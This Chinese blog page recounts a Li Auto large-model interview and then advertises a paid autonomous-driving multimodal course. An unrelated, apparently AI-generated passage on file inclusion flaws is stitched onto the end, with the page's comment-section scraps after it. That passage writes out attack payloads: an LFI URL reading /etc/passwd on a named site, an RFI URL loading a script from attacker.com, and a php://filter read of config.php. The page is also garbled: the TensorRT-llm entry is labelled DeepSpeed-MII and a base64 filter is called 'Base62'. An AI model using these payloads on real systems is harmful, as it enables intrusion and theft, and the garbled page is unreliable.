理想汽车大模型算法工程师面试,被问的瑟瑟发抖。。。。

最近面试了理想汽车大模型岗位,被面试官强度拉满了...不仅问到了很多大模型的基础,还有RAG、强化学习、部署的各种问题,尤其是对大模型如何落地自动驾驶进行了很长时间的讨论。毕竟理想的VLM是国内首个上车的,这块的经验积累还是比较丰富。

本文章主要记录了本小菜研找实习的坎坷历程,欢迎大佬们给建议!!!

1. 自我介绍

自我介绍环节主要是让大家进入快速面试状态,聊聊个人基本信息、教育背景、工作经历和技能特长等等。

2. 项目面

因为我简历上面写一个RAG项目,所以面试官主要围绕RAG进行提

  1. 问聊一下RAG项目总体思路?

  2. 在做RAG项目过程中遇到哪些问题?怎么解决的?

  3. RAG项目里面有哪一些亮点?目前开源的RAG项目非常多,你的项目和他们有什么区别?

  4. ...

通用大模型也问到了很多基础的内容:

  1. 阿里的Qwen-VL

  2. 任意模态算法X-InstructBLIP

  3. 统一视觉任务大模型的Florence2

  4. ...

3. 技术问题回答

3.1 简单介绍一下大模型存在哪些问题?有什么好的解决方法?

  • 大模型幻觉问题

  1. 外挂知识库

  2. 大模型微调

  3. 强化学习

  4. ...

3.2 大模型加速框架了解多少,知不知道原理 如何进行加速优化?

  1. vLLM

  • vLLm 运行大模型非常快主要使用以下方法实现的

    • 先进的服务吞吐量

    • 通过PageAttention 对attention key & value 内存进行有效的管理

    • 对于输入请求的连续批处理

    • 高度优化的CUDA kernels

  1. OpenLLM

  • OpenLLM 运行大模型非常快主要使用以下方法实现的

    • 促进实际生产过程中的大模型的部署,微调,服务和监测.

  1. TensorRT-llm

  • DeepSpeed-MII 运行大模型非常快主要使用以下方法实现的

    • 组装优化大语言模型推理解决方案的工具,提供Python API 来定义大模型,并为 NVIDIA GPU 编译高效的 TensorRT 引擎.

3.3 如何看待自动驾驶大模型?以及如何落地自动驾驶大模型?

这块聊了很多自动驾驶大模型的工作,像经典的DriveGPT4、OpenDriveLab的DriveLM,当然也离不开理想自己的工作DriveVLM,估计也是他们快慢双系统借鉴的核心算法。实战这块我自己跑过DriveLM,面试官还是比较感兴趣的,这块深入聊聊蛮多算法细节。

目前来看国内端到端的技术路线已经明确:就是端到端+大模型!据我了解,除了理想,像长安/小鹏都宣称大模型上车了。智能座舱和具身智能这块也是当下非常火爆的方向。未来大模型除了指导快系统外,像数据挖掘、标注等等应该都值得进一步探索。

这里也推荐下自动驾驶之心的多模态大模型课程,课程从通用多模态大模型,到大模型微调,最终在聚焦在端到端自动驾驶多模态大模型,基本上面试的东西课程里面都有介绍。课程大纲如下:

55000b0ef43b845e38c66dd763ef2b4d.png

课程内容一览

第一章:多模态大模型介绍

第一章主要介绍多模态大模型的基础概念,在整体上帮助同学们了解多模态大模型,打开大模型之路的大门。老师从多模态算法的概念出发,延伸到多模态大模型的结构&训练范式及公开数据集的介绍。在整体上对多模态大模型有一定了解后,我们会进一步聊聊实际的应用场景,让大家对未来可能从事的工作方向和工作内容有一定的了解,最后老师会介绍咱们课程的整体框架及预期的实战学习成果。

e2d22a9924102341a4597bdd66f5b99f.jpeg

第二章:多模态大模型的基础模块

第二章正式进入多模态大模型的基础模块学习。老师会首先介绍多模态大模型的整体架构。模态编码器是什么?Input Projector有什么作用?LLM Backbone是什么?Output Projector又用来做什么?最后的Modality Generator又如何应用到具体的模态生成?在这一章都会得到解答!

ab469f56acd40b3fc28ba60540381f42.png

第三章:通用多模态大模型

第三章聚焦于通用多模态大模型的讲解与实战。作为多模态大模型下游应用的基石,可以说没有通用多模态大模型的蓬勃发展,就不会有当下大模型应用百花齐放的局面。这一章节老师选取了五个算法展开详细介绍:涵盖了图文理解、视频理解、任意模态、轻量大模型以及实战-统一视觉任务大模型算法,即兼顾了学术界又兼顾了学术界。这一章老师将会带领同学们真正进入多模态大模型的世界。

7a130f3682a9252a450c7959d8acce8a.png

实际效果:

56afcfd494da78d3df9439d9bb2d9b97.jpeg

第四章:多模态大模型微调与强化学习

第四章则聚焦于业内应用最广泛的微调与强化学习技术。如果把通用多模态大模型比作大树的枝干,那么微调技术则是大模型开枝散叶的核心技术。这一章老师首先会做一个训练策略的概述,微调到底微调个啥?接下来则会进入六篇论文的精讲和实战,涉及Adapter、LoRA、QLoRA、Reward Model+PPO、KTO和实战算法DPO,这一章仍会兼顾学术界和工业界,学完这一章,你将有能力训练面向特定业务需求的多模态大模型。

9c04158bd68330207db29032d04b8e41.png

第五章:多模态大模型在自动驾驶中的应用

在讲解完通用大模型和微调技术后,第五章则聚焦于多模态大模型在自动驾驶中的应用,尤其是在端到端自动驾驶中的应用。老师选取了五个最有代表性的算法一一讲解,其中包含理想端到端自动驾驶量产方案参考的算法DriveVLM!在这一章,大家将会掌握最前沿的端到端自动驾驶大模型,为后面就业和升学增添助力!

1f000dc4cb79513aff9110eebf3a870e.png

第六章:多模态大模型求职专题

有了前面五个章节的技术积累,第六章咱们进入求职专题!这一章都是实打实老师工作多年的经验积累。业内有哪些公司?毕业应该从事什么方向?未来发展如何?多模态大模型当下应用的瓶颈在哪里?哪些问题是面试公司真正关心的?我们又该如何准备面试?在这一章你都讲得到答案!

f9fc1fbcb1a332627d3f05f6b2477999.png

适合人群

  • 高校研究人员与学生;

  • 初创企业技术团队;

  • 企业技术专家、骨干;

  • 想要转行从事大模型的同学;

讲师介绍

Sora老师,业内一线大厂高级算法工程师。研究方向多模态大语言模型、Agent等,从事座舱大模型落地和端到端大模型落地工作。在算法设计、模型部署、工程化落地上具有丰富经验,参与过国内、国外多个车厂与车型的poc及sop交付量产项目。

课程收获

  • 掌握通用大模型的核心理论与微调技术;

  • 掌握自动驾驶大模型在学术界&工业界的前沿算法;

  • 具备大模型微调&部署的实际能力;

  • 应用大模型解决实际问题的能力;

  • 提升科研&工作核心竞争力。

课程所需基础

  • 一定的深度学习与大模型基础;

  • 了解Transformer模型结构

  • Python和PyTorch基础,具备代码读写的能力;

  • 需要自备GPU,显存不低于12G;

开课时间与课程说明

2024.12.9号正式开课,由于是在线课程,课程购买后不支持退款。购买后,1年内有效。

课程咨询

扫码学习课程

c3d67a2785eaa15a8af2c22be0f3f24a.png

欢迎咨询小助理了解更多!

578cf6050b656c884a1ff57bf09bd388.jpeg



版权声明

自动驾驶之心所有课程最终版权均归自动驾驶之心团队及旗下公司所属,我们强烈谴责非法盗录行为,对违法行为将第一时间寄出律师函。也欢迎同学们监督举报,对热心监督举报的同学,我们将予以重报!

投诉微信:AIDriver004(备注:盗版举报)

用户的提似乎偏离了技术主题,转而询关于 Pikachu(皮卡丘)动画场景或表情包的内容。然而,基于所提供的引用内容,主要涉及的是网络安全领域中的文件包含漏洞相关内容,并未提及任何有关动画场景或表情包的信息。 如果用户希望了解与 `pikachu` 或其他相关资源的表情包或动画场景,则建议通过合法渠道获取此类素材,例如官方授权的媒体平台或者社交媒体上的分享链接。以下是针对文件包含漏洞的技术解析: ### 文件包含漏洞概述 文件包含漏洞是一种常见的 Web 应用程序安全漏洞,攻击者可以通过该漏洞读取服务器上的任意文件或将远程文件加载到应用程序中执行。这种漏洞通常分为两类:本地文件包含 (Local File Inclusion, LFI) 和远程文件包含 (Remote File Inclusion, RFI)[^1]。 #### 本地文件包含 (LFI) 当应用程序允许用户输入控制文件路径时,可能会发生本地文件包含漏洞。例如,在以下 URL 中传递参数可以尝试访敏感文件: ```text https://www.bihuoedu.com/vul/fileinclude/fi_local.php?filename=../../../../etc/passwd&submit=%E6%8F%90%E4%BA%A4 ``` 上述 payload 尝试读取 Linux 系统中的 `/etc/passwd` 文件[^4]。 #### 远程文件包含 (RFI) 远程文件包含是指攻击者能够使目标应用从外部源加载并执行脚本的情况。例如,利用 PHP 的 `file_get_contents()` 函数可以从远程地址加载恶意代码: ```php <?php $remote_file = $_GET['filename']; echo file_get_contents($remote_file); ?> ``` 构造如下 Payload 可能实现远程文件包含: ```text http://example.com/vulnerable_app.php?filename=http://attacker.com/malicious_script.php ``` 某些情况下还可以结合协议伪造成特殊用途的数据流,比如 Base62 编码后的文件内容: ```text http://localhost/vulnerable_app.php?filename=php://filter/convert.base64-encode/resource=config.php ``` 此方法被用来测试是否存在过滤机制以及如何绕过它们[^2]。 #### 防护措施 为了防止文件包含漏洞的发生,开发者应采取一系列防护手段来增强系统的安全性,包括但不限于以下几个方面: - **白名单验证**:仅接受预定义列表内的有效值作为文件名参数。 - **移除危险函数**:禁用可能导致风险的功能调用,像 include(), require() 等操作未经处理字符串前缀后缀的部分。 - **严格校验输入**:确保所有来自客户端的数据都经过彻底清洗后再用于构建动态查询语句或其他逻辑运算之中[^3]。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值